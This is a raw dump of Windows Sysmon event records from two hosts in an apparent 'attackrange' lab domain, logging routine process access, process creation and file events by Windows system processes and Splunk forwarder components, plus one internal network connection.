16:33:27.200{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D7-6063-5001-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061962Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061961Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061960Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061959Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061958Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-52D7-6063-5001-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061957Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.200{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D7-6063-5001-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061956Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.201{7F8C56E7-52D7-6063-5001-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246666Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:27.413{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33F58E1B739D4F7BBD1330A8097FD739,SHA256=79831D73B8BAB80ECC2EE53B7A1B4670729F798E1F4916A409E4F3CA69750153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246665Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:27.163{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1957FC8BCAE5EF7DEA0925246F1CF77,SHA256=787E352BF7839EA0106CCD41902BD2242398038BACEA29D6F3B3F70D5C8ACD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061983Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3946FBD703C28BDB6D4DF0E20364E09A,SHA256=9D12E91C19F13D488006549C7EBD1BDCC21BC493B720492F86E945F88A09450A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061982Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D8-6063-5201-00000000AF01}1124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061981Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061980Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061979Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061978Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061977Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-52D8-6063-5201-00000000AF01}1124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061976Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.559{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D8-6063-5201-00000000AF01}1124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061975Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.561{7F8C56E7-52D8-6063-5201-00000000AF01}1124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061974Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:28.012{7F8C56E7-52D7-6063-5101-00000000AF01}42805804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000246668Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:28.413{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0A40FD25E0C5D146E22F60300A937E,SHA256=3F259CF6A38B19207C35F049371C30DBF369354E6A20C114456ABD4915318106,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246667Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:26.598{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64828-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x80000000000000001062013Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062012Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062011Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062010Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062009Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062008Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062007Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062006Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062005Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062004Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 